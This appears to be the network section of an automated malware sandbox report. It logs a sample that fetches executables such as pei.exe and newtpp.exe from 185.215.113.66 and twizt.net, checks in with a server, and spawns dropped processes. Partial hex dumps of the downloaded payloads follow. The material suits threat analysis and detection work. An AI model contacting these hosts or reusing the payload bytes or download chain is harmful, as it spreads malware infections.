Oct 26, 2024 07:26:39.456613064 CEST  49812    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:39.456624031 CEST  80       49812    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:39.456638098 CEST  49812    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:39.456646919 CEST  80       49812    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:39.456655979 CEST  49812    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:39.456670046 CEST  80       49812    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:39.456686974 CEST  49812    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:39.456701040 CEST  49812    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:39.457607031 CEST  49812    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:39.457628012 CEST  49812    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:40.466260910 CEST  49823    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:40.477344990 CEST  80       49823    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:40.477518082 CEST  49823    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:40.477576971 CEST  49823    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:40.482857943 CEST  80       49823    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:41.389425039 CEST  80       49823    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:41.389451981 CEST  80       49823    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:41.389468908 CEST  80       49823    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:41.389489889 CEST  80       49823    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:41.389504910 CEST  80       49823    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:41.389520884 CEST  80       49823    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:41.389535904 CEST  80       49823    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:41.389553070 CEST  80       49823    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:41.389569044 CEST  49823    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:41.389569044 CEST  49823    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:41.389650106 CEST  49823    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:41.465442896 CEST  49829    40500    192.168.2.5      89.33.234.8
Oct 26, 2024 07:26:41.470726967 CEST  40500    49829    89.33.234.8      192.168.2.5
Oct 26, 2024 07:26:41.470827103 CEST  49829    40500    192.168.2.5      89.33.234.8
Oct 26, 2024 07:26:41.472419977 CEST  49829    40500    192.168.2.5      89.33.234.8
Oct 26, 2024 07:26:41.477749109 CEST  40500    49829    89.33.234.8      192.168.2.5
Oct 26, 2024 07:26:41.477807999 CEST  49829    40500    192.168.2.5      89.33.234.8
Oct 26, 2024 07:26:41.483130932 CEST  40500    49829    89.33.234.8      192.168.2.5
Oct 26, 2024 07:26:42.155122995 CEST  40500    49788    149.54.47.90     192.168.2.5
Oct 26, 2024 07:26:42.155188084 CEST  49788    40500    192.168.2.5      149.54.47.90
Oct 26, 2024 07:26:42.647948980 CEST  40500    49829    89.33.234.8      192.168.2.5
Oct 26, 2024 07:26:42.698966980 CEST  49829    40500    192.168.2.5      89.33.234.8
Oct 26, 2024 07:26:42.955670118 CEST  40500    49829    89.33.234.8      192.168.2.5
Oct 26, 2024 07:26:42.995825052 CEST  49829    40500    192.168.2.5      89.33.234.8
Oct 26, 2024 07:26:43.135077953 CEST  49829    40500    192.168.2.5      89.33.234.8
Oct 26, 2024 07:26:43.140431881 CEST  40500    49829    89.33.234.8      192.168.2.5
Oct 26, 2024 07:26:43.140506029 CEST  49829    40500    192.168.2.5      89.33.234.8
Oct 26, 2024 07:26:43.145859957 CEST  40500    49829    89.33.234.8      192.168.2.5
Oct 26, 2024 07:26:43.197953939 CEST  49829    40500    192.168.2.5      89.33.234.8
Oct 26, 2024 07:26:43.203277111 CEST  40500    49829    89.33.234.8      192.168.2.5
Oct 26, 2024 07:26:43.203345060 CEST  49829    40500    192.168.2.5      89.33.234.8
Oct 26, 2024 07:26:43.208683968 CEST  40500    49829    89.33.234.8      192.168.2.5
Oct 26, 2024 07:26:43.563544035 CEST  40500    49829    89.33.234.8      192.168.2.5
Oct 26, 2024 07:26:43.604784012 CEST  49829    40500    192.168.2.5      89.33.234.8
Oct 26, 2024 07:26:43.615372896 CEST  40500    49829    89.33.234.8      192.168.2.5
Oct 26, 2024 07:26:43.655961990 CEST  49829    40500    192.168.2.5      89.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:43.661324978 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.661374092 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:43.666768074 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.764127016 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:43.770195007 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.770289898 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:43.770405054 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:43.775641918 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.777103901 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:43.782968044 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.783035994 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:44.712740898 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712759018 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712769985 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712780952 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712857962 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.712857962 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.712871075 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712889910 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712903023 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712913036 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712924004 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712943077 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712946892 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.712975025 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.713061094 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.718314886 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.718327045 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.718338013 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.718350887 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.718411922 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.718444109 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.890561104 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890573025 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890589952 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890608072 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890625954 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890634060 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.890640020 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890652895 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890665054 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.890727043 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.891453981 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891597986 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891604900 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.891649961 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891732931 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.891792059 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891835928 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891848087 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891860008 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891881943 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.891911030 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.892501116 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.892513037 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.892529011 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.892549992 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.892561913 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.892611980 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.892611980 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.892611980 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.892648935 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.893392086 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.893403053 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.893414021 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.893429041 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.893440962 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.893460035 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.893477917 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.896028996 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.896107912 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.896212101 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.068409920 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068429947 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068443060 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068515062 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068526983 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068536997 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068578959 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.068579912 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.068579912 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.068785906 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068799019 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068809986 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068823099 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068835020 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068850040 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.068850040 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.068919897 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069119930 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069159985 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069217920 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069261074 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069272995 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069283962 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069295883 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069329977 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069329977 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069391966 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069534063 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069545984 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069555998 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069588900 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069602013 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069612980 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069623947 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069634914 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069669008 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069669008 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069669008 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069766045 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070065022 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070127964 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070138931 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070151091 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070171118 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070200920 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070203066 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070215940 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070228100 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070240974 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070246935 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070252895 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070286036 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070354939 CEST4984180192.168.2.591.202.233.141
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Oct 26, 2024 07:26:19.836764097 CEST  54677        53         192.168.2.5  1.1.1.1
Oct 26, 2024 07:26:19.849327087 CEST  53           54677      1.1.1.1      192.168.2.5
Oct 26, 2024 07:26:33.655013084 CEST  65053        40500      192.168.2.5  195.82.3.15
Oct 26, 2024 07:26:38.654037952 CEST  65053        40500      192.168.2.5  2.184.189.189
Oct 26, 2024 07:26:43.670932055 CEST  65053        40500      192.168.2.5  151.246.159.157
Oct 26, 2024 07:26:48.687298059 CEST  65053        40500      192.168.2.5  2.180.10.247
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name       Type            Class        DNS over HTTPS
Oct 26, 2024 07:26:19.836764097 CEST  192.168.2.5  1.1.1.1  0x3149    Standard query (0)  twizt.net  A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                          CName                   Address          Type                    Class        DNS over HTTPS
Oct 26, 2024 07:26:13.463243961 CEST  1.1.1.1    192.168.2.5  0xea11    No error (0)  fp2e7a.wpc.2be4.phicdn.net    fp2e7a.wpc.phicdn.net   -                CNAME (Canonical name)  IN (0x0001)  false
Oct 26, 2024 07:26:13.463243961 CEST  1.1.1.1    192.168.2.5  0xea11    No error (0)  fp2e7a.wpc.phicdn.net         -                       192.229.221.95   A (IP address)          IN (0x0001)  false
Oct 26, 2024 07:26:14.755975008 CEST  1.1.1.1    192.168.2.5  0x8cf5    No error (0)  bg.microsoft.map.fastly.net   -                       199.232.210.172  A (IP address)          IN (0x0001)  false
Oct 26, 2024 07:26:14.755975008 CEST  1.1.1.1    192.168.2.5  0x8cf5    No error (0)  bg.microsoft.map.fastly.net   -                       199.232.214.172  A (IP address)          IN (0x0001)  false
Oct 26, 2024 07:26:19.849327087 CEST  1.1.1.1    192.168.2.5  0x3149    No error (0)  twizt.net                     -                       185.215.113.66   A (IP address)          IN (0x0001)  false
                                                                                                                                                        • 185.215.113.66
                                                                                                                                                        • twizt.net
                                                                                                                                                        • 91.202.233.141
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49720        185.215.113.66  80                7256  C:\Users\user\Desktop\thcdVit1dX.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 26, 2024 07:26:16.809123039 CEST  281                OUT        GET /pei.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.215.113.66
Connection: Keep-Alive
Oct 26, 2024 07:26:17.704734087 CEST  1236               IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 26 Oct 2024 05:26:17 GMT
Content-Type: application/octet-stream
Content-Length: 9728
Last-Modified: Wed, 15 May 2024 14:33:59 GMT
Connection: keep-alive
ETag: "6644c7d7-2600"
Accept-Ranges: bytes


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49721        185.215.113.66  80                7348  C:\Users\user\AppData\Local\Temp\4BBF.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 26, 2024 07:26:19.861862898 CEST  174                OUT        GET /newtpp.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Host: twizt.net
Oct 26, 2024 07:26:20.780653954 CEST  1236               IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 26 Oct 2024 05:26:20 GMT
Content-Type: application/octet-stream
Content-Length: 85504
Last-Modified: Thu, 10 Oct 2024 07:41:50 GMT
Connection: keep-alive
ETag: "6707853e-14e00"
Accept-Ranges: bytes
                                                                                                                                                        Oct 26, 2024 07:26:20.780772924 CEST1236INData Raw: 00 00 00 02 00 00 89 96 28 02 00 00 ff 15 fc 00 41 00 83 c7 3c 57 ff 15 5c 00 41 00 e8 35 fe ff ff 8b c6 5e 5b 5f 5d c3 56 e8 a8 87 00 00 83 c4 04 33 f6 55 e8 2d 91 00 00 83 c4 04 8b c6 5e 5b 5f 5d c3 cc cc cc 56 8b 74 24 08 85 f6 74 3a 81 3e 69
                                                                                                                                                        Data Ascii: (A<W\A5^[_]V3U-^[_]Vt$t:>ilciu2tu)|@P\AL$tx^^UQj%EjMUMAUBE]UQEM
                                                                                                                                                        Oct 26, 2024 07:26:20.780790091 CEST1236INData Raw: 8b 11 52 e8 fa 82 00 00 83 c4 04 8b 45 08 c7 00 00 00 00 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 1c 8b 45 0c 25 ff ff 00 00 89 45 e4 8b 4d 0c c1 e9 10 81 e1 ff ff 00 00 89 4d ec 8b 55 10 81 e2 ff ff 00 00 89 55 fc 8b 45 10 c1
                                                                                                                                                        Data Ascii: RE]UE%EMMUUE%EMMUEEEMMMUUUE;EsEEMUMEEMUEM;UsEEMMUJEHM
                                                                                                                                                        Oct 26, 2024 07:26:20.780806065 CEST1236INData Raw: eb 07 c7 45 fc 00 00 00 00 8b 4d f8 8b 55 08 8b 04 8a 8b 4d f8 8b 55 10 03 04 8a 8b 4d f8 8b 55 08 89 04 8a 8b 45 f8 8b 4d 08 8b 55 f8 8b 75 10 8b 04 81 3b 04 96 73 09 8b 4d fc 83 c1 01 89 4d fc eb 82 8b 45 fc 5e 8b e5 5d c3 cc cc cc 55 8b ec 83
                                                                                                                                                        Data Ascii: EMUMUMUEMUu;sMME^]UEEMMEUUE9EsMUEEEM;MUE<uMMUEEEEM;MU
                                                                                                                                                        Oct 26, 2024 07:26:20.780823946 CEST1236INData Raw: dc e9 4a fe ff ff 8b 4d fc 89 4d d0 eb 09 8b 55 d0 83 c2 01 89 55 d0 8b 45 cc 03 45 fc 39 45 d0 7d 0f 8b 4d d0 8b 55 e4 c7 04 8a 00 00 00 00 eb dd 8b 45 fc 50 8b 4d c8 51 8b 55 0c 52 8b 45 0c 50 e8 d4 06 00 00 83 c4 10 8b 4d fc 51 8b 55 c8 52 8b
                                                                                                                                                        Data Ascii: JMMUUEE9E}MUEPMQUREPMQUREPMQ3]U}uEEEEEM;MUEQUREPMU+EMU+EMU9vEE
                                                                                                                                                        Oct 26, 2024 07:26:20.786729097 CEST1236INData Raw: 7d f8 00 75 04 33 c0 eb 49 c7 45 fc 00 00 00 00 c7 45 f4 00 00 00 80 eb 11 8b 55 f4 d1 ea 89 55 f4 8b 45 fc 83 c0 01 89 45 fc 83 7d f4 00 76 13 8b 4d f8 8b 55 08 8b 44 8a fc 23 45 f4 74 02 eb 02 eb d6 8b 4d f8 c1 e1 05 2b 4d fc 89 4d f0 8b 45 f0
                                                                                                                                                        Data Ascii: }u3IEEUUEE}vMUD#EtM+MME]UQVEEEM;MsUEMu^]UEEMUUtEMUEE]UQEEEM;Ms
Oct 26, 2024 07:26:25.246774912 CEST | 176 | OUT | GET /peinstall.php HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                                                                                        Host: twizt.net
Oct 26, 2024 07:26:25.627481937 CEST | 184 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Sat, 26 Oct 2024 05:26:25 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
(The body is a single zero-length chunk followed by CRLF CRLF, i.e. the chunked-encoding terminator: the /peinstall.php check-in returned an empty response.)


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.5  49771        185.215.113.66  80                7488  C:\Windows\sysppvrdnvs.exe

Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 07:26:30.994864941 CEST | 166 | OUT | GET /1 HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                        Host: 185.215.113.66
Oct 26, 2024 07:26:31.911458969 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Sat, 26 Oct 2024 05:26:31 GMT
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        Content-Length: 110600
                                                                                                                                                        Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        ETag: "66f3a94a-1b008"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                                        Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                                        Oct 26, 2024 07:26:31.911535025 CEST112INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                                        Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:
                                                                                                                                                        Oct 26, 2024 07:26:31.911545992 CEST1236INData Raw: df 50 5e 7f 28 4b 33 04 b4 3a a9 20 79 58 ed e3 8d 4d 5e 67 51 44 02 be a3 81 02 86 c9 f0 14 35 97 13 d9 96 cd e0 8c 35 1e b0 21 48 c2 e1 c2 46 e2 3f 1f af 7d 27 2b bf d5 57 0d 78 72 8d 70 c8 38 de 55 5f 48 89 81 a8 19 d0 bc 93 4b 5c e0 ff b8 c2
                                                                                                                                                        Data Ascii: P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)|Rai>&y+eu BUHj{y0mlU"3S+I)~5DX#o&n3_$by<DLy/9o-T&ge1c80G~q!&
